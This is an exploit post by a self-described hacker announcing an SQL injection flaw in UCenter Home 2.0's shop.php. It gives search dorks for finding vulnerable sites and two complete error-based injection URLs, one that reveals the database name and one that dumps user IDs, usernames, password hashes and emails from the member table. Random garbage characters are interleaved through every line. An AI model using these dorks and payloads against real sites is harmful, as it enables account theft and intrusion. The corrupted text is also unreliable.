G& E5 T! q: ^" S! U3 B+ C__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
1 V2 k) d# ]5 {2 M+ J
- U1 x! E G3 |8 F9 H: E4 K 7 c3 Q$ D5 q% Y* t J: _4 l7 k# s' H# y
1 V, D+ S) a2 ~% ^% x/ `
*/ Author : KnocKout ! r, k e0 n2 e0 J& D. q
6 o3 r8 y1 @- r* H*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers * y) Q- b) J N+ M' `
( m, C1 A1 q$ p4 S; z
*/ Contact: knockoutr@msn.com
# B( R/ _5 l2 ?
5 o. h. r7 K7 V" d9 p. E7 D*/ Cyber-Warrior.org/CWKnocKout
5 q2 C/ p$ s- V9 q- I! v
f/ s9 Y8 K) K1 T0 ]1 Y: c9 T__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 6 l! L8 K& A5 _- T o* B6 ?+ ^; ~
! E- f5 @: c& N0 eScript : UCenter Home `1 }1 z+ e* H c3 d' C
0 o6 V' e0 [" w7 i& H- j' A+ VVersion : 2.0
+ O" k8 S, ^4 D. Y" H$ E7 b) O
2 q# I' R( f2 N' f2 i3 j: i8 ^Script HomePage : http://u.discuz.net/
# D% s; {) v, ?( C# |' [# M' ~' B) P- G! g P
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
( a8 A, W- v! L( A4 \; Z4 Y9 u: m( O. C5 e
Dork : Powered by UCenter inurl:shop.php?ac=view
; R; f, r) [" W- T+ _
* `# ~3 S( f8 m! c. j: l/ O/ r _: eDork 2 : inurl:shop.php?ac=view&shopid=
# @( f/ j1 _5 @( Y) J* k; L7 C4 t* U
8 R( s* |8 L* a__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ! ~* y4 S! f) i& Z
2 I" @6 P! C* ~2 m
Vuln file : Shop.php
0 n) y. G) }9 w0 `7 d8 x* H' N6 V- P4 J: O( a- l# e7 x
value's : (?)ac=view&shopid=
) G6 [9 M& [% I: _
7 {& c6 Q _0 r$ Z/ LVulnerable Style : SQL Injection (MySQL Error Based) / [( S! ^- u# J$ N, a- C6 w6 N5 {
3 o& q/ |9 _$ h7 n a; ^/ l C9 g
Need Metarials : Hex Conversion 4 G8 }9 i6 d+ x- p: P
, K, u" q6 M1 u__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
9 T' c4 t/ V! m& X8 v* s6 H. ^# J3 U9 \2 g/ s/ e
Your Need victim Database name. % P5 i6 H, y. z; o- C
& j, p1 ~. [5 }) M) A* d# v. |for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
" ?) V$ M8 i) b: \
" q4 L. Z- }: D8 G( d% ?..
9 N- E- W. p$ J$ c' r/ q# G
% H0 O1 @& j: b- P: M, p2 b( C& PDB : Okey.
9 p: q3 p+ C2 z ^1 [2 A
1 v) |5 E/ v/ V% ryour edit DB `[TARGET DB NAME]`
8 [. Y$ r# P( f) B+ c4 m' |; p1 c0 f: n- ~6 h% m- t7 k$ u8 ?
Example : 'hiwir1_ucenter'
3 S$ c/ M- f6 l; v* j$ u& c% k) d8 ?7 W+ ~$ N
Edit : Okey. 1 H4 V" Z2 z" N s) ~$ F) s% R- ?. K
( |& Q7 @. i2 V1 D7 _. D2 TYour use Hex conversion. And edit Your SQL Injection Exploit..
1 p9 e5 P4 ?1 P; k; _4 W' X) M9 H# [( I- \% o. f5 ~( L5 }. ~
5 y5 S6 b( z5 R: F- x. ?0 q) C
5 Y& w( q9 S# j) q o8 Y) ^, N( o8 KExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
( c: s* M- V( L( @2 p$ h0 O* A |